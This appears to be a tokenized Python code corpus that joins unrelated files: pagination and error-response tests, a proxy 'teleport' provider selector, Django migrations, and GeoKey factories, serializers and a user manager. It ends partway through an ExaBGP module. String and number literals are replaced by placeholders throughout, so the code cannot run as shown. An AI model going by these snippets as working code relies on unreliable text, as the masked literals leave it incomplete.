assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> def test_get_response_data_paginate_with_sort ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . sort = '<STR_LIT>' <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:2> <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( len ( data ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( data [ <NUM_LIT:0> ] , { '<STR_LIT:id>' : <NUM_LIT:2> , '<STR_LIT:name>' : '<STR_LIT:c>' } ) <EOL> self . assertEqual ( data [ <NUM_LIT:1> ] , { '<STR_LIT:id>' : <NUM_LIT:4> , '<STR_LIT:name>' : '<STR_LIT:b>' } ) <EOL> def test_get_response_data_pagination_out_of_bounds ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:5> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , [ ] ) <EOL> def test_get_response_data_invalid_offset ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = - <NUM_LIT:1> <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:10> <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . offset = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . offset = True <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> def test_get_response_data_invalid_limit ( self ) : <EOL> self . response . resources = self . test_data <EOL> self . response . meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . response . 
meta [ '<STR_LIT>' ] [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . limit = - <NUM_LIT:1> <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . limit = '<STR_LIT>' <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> self . response . limit = False <EOL> self . assertRaises ( BadRequestError , self . response . get_response_data ) <EOL> class TestErrorResponse ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . request_mock = mock . MagicMock ( ) <EOL> self . error = MethodNotAllowedError ( ) <EOL> self . response = ErrorResponse ( http_error = self . error , <EOL> request = self . request_mock ) <EOL> def test_attributes ( self ) : <EOL> self . assertEqual ( self . response . status_code , <NUM_LIT> ) <EOL> self . assertEqual ( self . response . error , str ( self . error ) ) <EOL> self . assertEqual ( self . response . meta , { '<STR_LIT>' : None } ) <EOL> self . assertEqual ( self . response . response_type , '<STR_LIT:error>' ) <EOL> def test_get_response_data_empty ( self ) : <EOL> data = self . response . get_response_data ( ) <EOL> self . assertEqual ( data , None ) </s>
<s> import itertools <EOL> import random <EOL> import requests <EOL> import logging <EOL> registry = { } <EOL> class Plugin ( type ) : <EOL> def __new__ ( metacls , name , bases , namespace , ** kwargs ) : <EOL> cls = type . __new__ ( metacls , name , bases , dict ( namespace ) ) <EOL> if hasattr ( cls , "<STR_LIT>" ) : <EOL> registry [ cls . __provider_name__ ] = cls <EOL> return cls <EOL> class TeleportationProvider ( object ) : <EOL> __metaclass__ = Plugin <EOL> GEOIP_URL = '<STR_LIT>' <EOL> def __init__ ( self , name , countries , debug = False , ** kwargs ) : <EOL> self . name = name <EOL> self . countries = countries <EOL> self . debug = debug <EOL> self . kwargs = kwargs <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . __provider_name__ , self . name ) <EOL> def can_teleport_to ( self , place ) : <EOL> return place in self . countries <EOL> def teleport ( self , place ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented <EOL> @ property <EOL> def is_proxy ( self ) : <EOL> return False <EOL> def where_we_teleported ( self ) : <EOL> return requests . get ( self . GEOIP_URL , proxies = self . get_proxies ( ) ) . text . lower ( ) <EOL> def go_home ( self ) : <EOL> pass <EOL> def get_proxies ( self ) : <EOL> return { } <EOL> def get_peer_address ( self ) : <EOL> raise NotImplementedError <EOL> def _shuffle ( i ) : <EOL> i = list ( i ) <EOL> random . shuffle ( i ) <EOL> return i <EOL> def _construct ( args ) : <EOL> if args [ "<STR_LIT:type>" ] not in registry : <EOL> raise RuntimeError ( "<STR_LIT>" . format ( args [ "<STR_LIT:type>" ] ) ) <EOL> return registry [ args [ "<STR_LIT:type>" ] ] ( ** args ) <EOL> class Teleport ( object ) : <EOL> def __init__ ( self , config ) : <EOL> self . config = config <EOL> def get_sorted_providers ( self ) : <EOL> by_priority = lambda provider : provider [ "<STR_LIT>" ] <EOL> sorted_by_priority = sorted ( self . config [ "<STR_LIT>" ] , key = by_priority ) <EOL> grouped_by_priority = itertools . 
groupby ( sorted_by_priority , key = by_priority ) <EOL> res = [ ] <EOL> for _ , providers in grouped_by_priority : <EOL> for args in _shuffle ( providers ) : <EOL> res . append ( _construct ( args ) ) <EOL> return res <EOL> def who_can_teleport_to ( self , place ) : <EOL> return [ <EOL> provider for provider in self . get_sorted_providers ( ) <EOL> if provider . can_teleport_to ( place ) <EOL> ] <EOL> def goto ( self , place ) : <EOL> """<STR_LIT>""" <EOL> providers = self . who_can_teleport_to ( place ) <EOL> if not providers : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( place ) ) <EOL> logging . info ( '<STR_LIT>' , place , providers ) <EOL> _errors = [ ] <EOL> for provider in providers : <EOL> logging . info ( '<STR_LIT>' . format ( provider ) ) <EOL> try : <EOL> if provider . teleport ( place ) : <EOL> return provider <EOL> logging . error ( '<STR_LIT>' . format ( provider ) ) <EOL> provider . go_home ( ) <EOL> except Exception as e : <EOL> logging . exception ( '<STR_LIT>' , provider ) <EOL> _errors . append ( e ) <EOL> raise RuntimeError ( '<STR_LIT>' . format ( place , _errors ) ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> from django . conf import settings <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . BooleanField ( default = False ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT:user>' , <EOL> field = models . ForeignKey ( related_name = '<STR_LIT>' , to = settings . AUTH_USER_MODEL ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> import factory <EOL> from geokey . core . tests . helpers . image_helpers import get_image <EOL> from geokey . users . tests . model_factories import UserFactory <EOL> from geokey . projects . tests . model_factories import ProjectFactory <EOL> from . . models import ( <EOL> Category , TextField , NumericField , DateTimeField , DateField , TimeField , <EOL> LookupField , LookupValue , Field , MultipleLookupField , MultipleLookupValue <EOL> ) <EOL> class CategoryFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Category <EOL> creator = factory . SubFactory ( UserFactory ) <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> project = factory . SubFactory ( ProjectFactory ) <EOL> status = '<STR_LIT>' <EOL> class FieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = Field <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> order = <NUM_LIT:0> <EOL> class TextFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = TextField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class NumericFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = NumericField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . 
Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class DateTimeFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = DateTimeField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class DateFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = DateField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class TimeFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = TimeField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class LookupFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = LookupField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . 
SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class LookupValueFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = LookupValue <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> symbol = get_image ( file_name = '<STR_LIT>' ) <EOL> field = factory . SubFactory ( LookupFieldFactory ) <EOL> status = '<STR_LIT>' <EOL> class MultipleLookupFieldFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = MultipleLookupField <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> key = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> description = factory . LazyAttribute ( lambda o : '<STR_LIT>' % o . name ) <EOL> category = factory . SubFactory ( CategoryFactory ) <EOL> status = '<STR_LIT>' <EOL> required = False <EOL> class MultipleLookupValueFactory ( factory . django . DjangoModelFactory ) : <EOL> class Meta : <EOL> model = MultipleLookupValue <EOL> name = factory . Sequence ( lambda n : '<STR_LIT>' % n ) <EOL> symbol = get_image ( file_name = '<STR_LIT>' ) <EOL> field = factory . SubFactory ( MultipleLookupFieldFactory ) <EOL> status = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import requests <EOL> import tempfile <EOL> from django . core import files <EOL> from django . core . exceptions import PermissionDenied , ValidationError <EOL> from easy_thumbnails . files import get_thumbnailer <EOL> from easy_thumbnails . exceptions import InvalidImageFormatError <EOL> from rest_framework import serializers <EOL> from rest_framework_gis import serializers as geoserializers <EOL> from rest_framework . serializers import BaseSerializer <EOL> from geokey . categories . serializers import CategorySerializer <EOL> from geokey . categories . models import Category <EOL> from geokey . users . serializers import UserSerializer <EOL> from . models import ( <EOL> Observation , <EOL> Location , <EOL> Comment , <EOL> MediaFile , <EOL> ImageFile , <EOL> VideoFile , <EOL> AudioFile <EOL> ) <EOL> class LocationSerializer ( geoserializers . GeoFeatureModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = Location <EOL> geo_field = '<STR_LIT>' <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT:status>' , '<STR_LIT>' ) <EOL> write_only_fields = ( '<STR_LIT:status>' , ) <EOL> class LocationContributionSerializer ( serializers . ModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> class Meta : <EOL> model = Location <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT:status>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> write_only_fields = ( '<STR_LIT:status>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def create ( self , validated_data ) : <EOL> """<STR_LIT>""" <EOL> validated_data [ '<STR_LIT>' ] = self . context . get ( '<STR_LIT:user>' ) <EOL> return super ( <EOL> LocationContributionSerializer , <EOL> self <EOL> ) . 
create ( validated_data ) <EOL> class ContributionSerializer ( BaseSerializer ) : <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def many_init ( cls , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> kwargs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = True <EOL> return super ( ContributionSerializer , cls ) . many_init ( * args , ** kwargs ) <EOL> def validate_category ( self , project , category_id ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> category = None <EOL> try : <EOL> category = project . categories . get ( pk = category_id ) <EOL> if category . status == '<STR_LIT>' : <EOL> errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> else : <EOL> self . _validated_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] = category <EOL> except Category . DoesNotExist : <EOL> errors . append ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> if errors : <EOL> self . _errors [ '<STR_LIT>' ] = errors <EOL> return category <EOL> def replace_null ( self , properties ) : <EOL> """<STR_LIT>""" <EOL> for key , value in properties . iteritems ( ) : <EOL> if isinstance ( value , ( str , unicode ) ) and len ( value ) == <NUM_LIT:0> : <EOL> properties [ key ] = None <EOL> return properties <EOL> def validate_properties ( self , properties , category = None , status = None ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> if self . instance : <EOL> status = status or self . instance . status <EOL> if self . instance . properties : <EOL> update = self . instance . properties . copy ( ) <EOL> update . update ( properties ) <EOL> properties = update <EOL> else : <EOL> status = status or category . default_status <EOL> properties = self . replace_null ( properties ) <EOL> try : <EOL> if status == '<STR_LIT>' : <EOL> Observation . validate_partial ( category , properties ) <EOL> else : <EOL> Observation . validate_full ( category , properties ) <EOL> except ValidationError , e : <EOL> errors . append ( e ) <EOL> self . _validated_data [ '<STR_LIT>' ] = properties <EOL> self . 
_validated_data [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] = status <EOL> if errors : <EOL> self . _errors [ '<STR_LIT>' ] = errors <EOL> def validate_location ( self , project , location_id ) : <EOL> """<STR_LIT>""" <EOL> errors = [ ] <EOL> self . location = None <EOL> try : <EOL> if location_id is not None : <EOL> self . location = Location . objects . get_single ( <EOL> self . context . get ( '<STR_LIT:user>' ) , <EOL> project . id , <EOL> location_id <EOL> ) <EOL> except PermissionDenied , error : <EOL> errors . append ( error ) <EOL> except Location . DoesNotExist , error : <EOL> errors . append ( error ) <EOL> if errors : <EOL> self . _errors [ '<STR_LIT:location>' ] = errors <EOL> def is_valid ( self , raise_exception = False ) : <EOL> """<STR_LIT>""" <EOL> self . _errors = { } <EOL> self . _validated_data = self . initial_data <EOL> project = self . context . get ( '<STR_LIT>' ) <EOL> meta = self . initial_data . get ( '<STR_LIT>' ) <EOL> if meta is None : <EOL> self . _validated_data [ '<STR_LIT>' ] = dict ( ) <EOL> location_id = None <EOL> if self . initial_data . get ( '<STR_LIT:location>' ) is not None : <EOL> location_id = self . initial_data . get ( '<STR_LIT:location>' ) . get ( '<STR_LIT:id>' ) <EOL> self . validate_location ( project , location_id ) <EOL> category = None <EOL> if self . instance is None and meta is not None : <EOL> category = self . validate_category ( project , meta . get ( '<STR_LIT>' ) ) <EOL> else : <EOL> category = self . instance . category <EOL> self . _validated_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] = category <EOL> properties = self . initial_data . get ( '<STR_LIT>' ) or { } <EOL> status = None <EOL> if meta is not None : <EOL> status = meta . get ( '<STR_LIT:status>' , None ) <EOL> if properties is not None and category is not None : <EOL> self . validate_properties ( <EOL> properties , <EOL> category = category , <EOL> status = status <EOL> ) <EOL> if self . _errors and raise_exception : <EOL> raise ValidationError ( self . 
_errors ) <EOL> return not bool ( self . _errors ) <EOL> def create ( self , validated_data ) : <EOL> """<STR_LIT>""" <EOL> project = self . context . get ( '<STR_LIT>' ) <EOL> meta = validated_data . pop ( '<STR_LIT>' ) <EOL> location_serializer = LocationContributionSerializer ( <EOL> self . location , <EOL> data = validated_data . pop ( '<STR_LIT:location>' , None ) , <EOL> context = self . context <EOL> ) <EOL> if location_serializer . is_valid ( ) : <EOL> location_serializer . save ( ) <EOL> self . instance = Observation . create ( <EOL> properties = validated_data . get ( '<STR_LIT>' ) , <EOL> creator = self . context . get ( '<STR_LIT:user>' ) , <EOL> location = location_serializer . instance , <EOL> project = project , <EOL> category = meta . get ( '<STR_LIT>' ) , <EOL> status = meta . pop ( '<STR_LIT:status>' , None ) <EOL> ) <EOL> return self . instance <EOL> def update ( self , instance , validated_data ) : <EOL> """<STR_LIT>""" <EOL> meta = validated_data . get ( '<STR_LIT>' ) <EOL> status = None <EOL> if meta is not None : <EOL> status = meta . get ( '<STR_LIT:status>' , None ) <EOL> location_serializer = LocationContributionSerializer ( <EOL> instance . location , <EOL> data = validated_data . pop ( '<STR_LIT:location>' , { } ) , <EOL> context = self . context , <EOL> partial = True <EOL> ) <EOL> if location_serializer . is_valid ( ) : <EOL> location_serializer . save ( ) <EOL> return instance . update ( <EOL> properties = validated_data . get ( '<STR_LIT>' ) , <EOL> updator = self . context . get ( '<STR_LIT:user>' ) , <EOL> status = status <EOL> ) <EOL> def get_display_field ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if obj . display_field is not None : <EOL> display_field = obj . display_field . 
split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> value = display_field [ <NUM_LIT:1> ] if display_field [ <NUM_LIT:1> ] != '<STR_LIT:None>' else None <EOL> return { <EOL> '<STR_LIT:key>' : display_field [ <NUM_LIT:0> ] , <EOL> '<STR_LIT:value>' : value <EOL> } <EOL> else : <EOL> return None <EOL> def to_representation ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> location = obj . location <EOL> isowner = False <EOL> if not self . context . get ( '<STR_LIT:user>' ) . is_anonymous ( ) : <EOL> isowner = obj . creator == self . context . get ( '<STR_LIT:user>' ) <EOL> updator = None <EOL> if obj . updator is not None : <EOL> updator = { <EOL> '<STR_LIT:id>' : obj . updator . id , <EOL> '<STR_LIT>' : obj . updator . display_name <EOL> } <EOL> feature = { <EOL> '<STR_LIT:id>' : obj . id , <EOL> '<STR_LIT>' : obj . properties , <EOL> '<STR_LIT>' : self . get_display_field ( obj ) , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:status>' : obj . status , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : obj . creator . id , <EOL> '<STR_LIT>' : obj . creator . display_name <EOL> } , <EOL> '<STR_LIT>' : updator , <EOL> '<STR_LIT>' : str ( obj . created_at ) , <EOL> '<STR_LIT>' : str ( obj . updated_at ) , <EOL> '<STR_LIT:version>' : obj . version , <EOL> '<STR_LIT>' : isowner , <EOL> '<STR_LIT>' : obj . num_media , <EOL> '<STR_LIT>' : obj . num_comments <EOL> } , <EOL> '<STR_LIT:location>' : { <EOL> '<STR_LIT:id>' : location . id , <EOL> '<STR_LIT:name>' : location . name , <EOL> '<STR_LIT:description>' : location . description , <EOL> '<STR_LIT>' : location . geometry . geojson <EOL> } <EOL> } <EOL> if self . context . get ( '<STR_LIT>' ) : <EOL> cat = obj . category <EOL> feature [ '<STR_LIT>' ] [ '<STR_LIT>' ] = { <EOL> '<STR_LIT:id>' : cat . id , <EOL> '<STR_LIT:name>' : cat . name , <EOL> '<STR_LIT:description>' : cat . description , <EOL> '<STR_LIT>' : cat . symbol . url if cat . symbol else None , <EOL> '<STR_LIT>' : cat . 
colour <EOL> } <EOL> else : <EOL> category_serializer = CategorySerializer ( <EOL> obj . category , context = self . context ) <EOL> feature [ '<STR_LIT>' ] [ '<STR_LIT>' ] = category_serializer . data <EOL> comment_serializer = CommentSerializer ( <EOL> obj . comments . filter ( respondsto = None ) , <EOL> many = True , <EOL> context = self . context <EOL> ) <EOL> feature [ '<STR_LIT>' ] = comment_serializer . data <EOL> review_serializer = CommentSerializer ( <EOL> obj . comments . filter ( review_status = '<STR_LIT>' ) , <EOL> many = True , <EOL> context = self . context <EOL> ) <EOL> feature [ '<STR_LIT>' ] = review_serializer . data <EOL> file_serializer = FileSerializer ( <EOL> obj . files_attached . all ( ) , <EOL> many = True , <EOL> context = self . context <EOL> ) <EOL> feature [ '<STR_LIT>' ] = file_serializer . data <EOL> return feature <EOL> class CommentSerializer ( serializers . ModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> creator = UserSerializer ( fields = ( '<STR_LIT:id>' , '<STR_LIT>' ) , read_only = True ) <EOL> isowner = serializers . SerializerMethodField ( ) <EOL> class Meta : <EOL> model = Comment <EOL> fields = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ) <EOL> read_only = ( '<STR_LIT:id>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> def to_representation ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> native = super ( CommentSerializer , self ) . to_representation ( obj ) <EOL> native [ '<STR_LIT>' ] = CommentSerializer ( <EOL> obj . responses . all ( ) , <EOL> many = True , <EOL> context = self . context <EOL> ) . data <EOL> return native <EOL> def get_isowner ( self , comment ) : <EOL> """<STR_LIT>""" <EOL> if not self . context . get ( '<STR_LIT:user>' ) . is_anonymous ( ) : <EOL> return comment . creator == self . context . get ( '<STR_LIT:user>' ) <EOL> else : <EOL> return False <EOL> class FileSerializer ( serializers . 
ModelSerializer ) : <EOL> """<STR_LIT>""" <EOL> creator = UserSerializer ( fields = ( '<STR_LIT:id>' , '<STR_LIT>' ) ) <EOL> isowner = serializers . SerializerMethodField ( ) <EOL> url = serializers . SerializerMethodField ( ) <EOL> file_type = serializers . SerializerMethodField ( ) <EOL> thumbnail_url = serializers . SerializerMethodField ( ) <EOL> class Meta : <EOL> model = MediaFile <EOL> fields = ( <EOL> '<STR_LIT:id>' , '<STR_LIT:name>' , '<STR_LIT:description>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT:url>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) <EOL> def get_file_type ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> return obj . type_name <EOL> def get_isowner ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if not self . context . get ( '<STR_LIT:user>' ) . is_anonymous ( ) : <EOL> return obj . creator == self . context . get ( '<STR_LIT:user>' ) <EOL> else : <EOL> return False <EOL> def get_url ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , ImageFile ) : <EOL> return obj . image . url <EOL> elif isinstance ( obj , VideoFile ) : <EOL> return obj . youtube_link <EOL> elif isinstance ( obj , AudioFile ) : <EOL> return obj . audio . url <EOL> def _get_thumb ( self , image , size = ( <NUM_LIT> , <NUM_LIT> ) ) : <EOL> """<STR_LIT>""" <EOL> thumbnailer = get_thumbnailer ( image ) <EOL> thumb = thumbnailer . get_thumbnail ( { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:size>' : size <EOL> } ) <EOL> return thumb <EOL> def get_thumbnail_url ( self , obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , ImageFile ) : <EOL> try : <EOL> return self . _get_thumb ( obj . image ) . url <EOL> except ( <EOL> IOError , <EOL> InvalidImageFormatError <EOL> ) : <EOL> return '<STR_LIT>' <EOL> elif isinstance ( obj , VideoFile ) : <EOL> if obj . thumbnail : <EOL> return self . _get_thumb ( obj . thumbnail ) . url <EOL> request = requests . get ( <EOL> '<STR_LIT>' % obj . youtube_id , <EOL> stream = True <EOL> ) <EOL> if request . 
status_code != requests . codes . ok : <EOL> return '<STR_LIT>' <EOL> lf = tempfile . NamedTemporaryFile ( ) <EOL> for block in request . iter_content ( <NUM_LIT> * <NUM_LIT:8> ) : <EOL> if not block : <EOL> break <EOL> lf . write ( block ) <EOL> file_name = obj . youtube_id + '<STR_LIT>' <EOL> obj . thumbnail . save ( file_name , files . File ( lf ) ) <EOL> from PIL import Image <EOL> w , h = Image . open ( obj . thumbnail ) . size <EOL> thumb = self . _get_thumb ( obj . thumbnail , size = ( h , h ) ) <EOL> obj . thumbnail . save ( file_name , thumb ) <EOL> return self . _get_thumb ( obj . thumbnail ) . url <EOL> elif isinstance ( obj , AudioFile ) : <EOL> return '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> class Unauthenticated ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class MalformedRequestData ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InputError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FileTypeError ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( default = b'<STR_LIT>' , max_length = <NUM_LIT:20> , choices = [ ( b'<STR_LIT:true>' , b'<STR_LIT:true>' ) , ( b'<STR_LIT>' , b'<STR_LIT>' ) , ( b'<STR_LIT:false>' , b'<STR_LIT:false>' ) ] ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> """<STR_LIT>""" <EOL> from django . contrib . auth . models import BaseUserManager <EOL> from django . utils import timezone <EOL> class UserManager ( BaseUserManager ) : <EOL> """<STR_LIT>""" <EOL> def create_user ( self , email , display_name , password = None , is_active = True , <EOL> ** extra_fields ) : <EOL> """<STR_LIT>""" <EOL> now = timezone . now ( ) <EOL> email = UserManager . normalize_email ( email ) <EOL> user = self . model ( email = email , display_name = display_name , <EOL> is_active = is_active , last_login = now , date_joined = now , <EOL> ** extra_fields ) <EOL> user . set_password ( password ) <EOL> user . save ( using = self . _db ) <EOL> return user <EOL> def create_superuser ( self , email , display_name , password , ** extra_fields ) : <EOL> """<STR_LIT>""" <EOL> user = self . create_user ( email , display_name , password = password , <EOL> ** extra_fields ) <EOL> user . is_superuser = True <EOL> user . save ( ) <EOL> return user <EOL> def get_by_natural_key ( self , username ) : <EOL> """<STR_LIT>""" <EOL> return self . get ( email__iexact = username ) </s>
<s> """<STR_LIT>""" <EOL> from os . path import join <EOL> from setuptools import setup , find_packages <EOL> from geokey . version import get_version <EOL> name = '<STR_LIT>' <EOL> version = get_version ( ) <EOL> repository = join ( '<STR_LIT>' , name ) <EOL> def get_install_requires ( ) : <EOL> """<STR_LIT>""" <EOL> requirements = list ( ) <EOL> for line in open ( '<STR_LIT>' ) . readlines ( ) : <EOL> if line . startswith ( '<STR_LIT:#>' ) or line . startswith ( '<STR_LIT>' ) or line == '<STR_LIT>' : <EOL> continue <EOL> requirements . append ( line . rstrip ( ) ) <EOL> return requirements <EOL> setup ( <EOL> name = name , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = join ( repository , '<STR_LIT>' , version ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( ) , <EOL> include_package_data = True , <EOL> install_requires = get_install_requires ( ) , <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> from exabgp . protocol . family import AFI <EOL> from exabgp . protocol . family import SAFI <EOL> from exabgp . bgp . message . open . capability . capability import Capability <EOL> from exabgp . bgp . message . open . capability . addpath import AddPath <EOL> from exabgp . bgp . message . open . capability . asn4 import ASN4 <EOL> from exabgp . bgp . message . open . capability . graceful import Graceful <EOL> from exabgp . bgp . message . open . capability . mp import MultiProtocol <EOL> from exabgp . bgp . message . open . capability . ms import MultiSession <EOL> from exabgp . bgp . message . open . capability . operational import Operational <EOL> from exabgp . bgp . message . open . capability . refresh import RouteRefresh <EOL> from exabgp . bgp . message . open . capability . refresh import EnhancedRouteRefresh <EOL> from exabgp . bgp . message . open . capability . hostname import HostName <EOL> from exabgp . bgp . message . notification import Notify <EOL> class Parameter ( int ) : <EOL> AUTHENTIFICATION_INFORMATION = <NUM_LIT> <EOL> 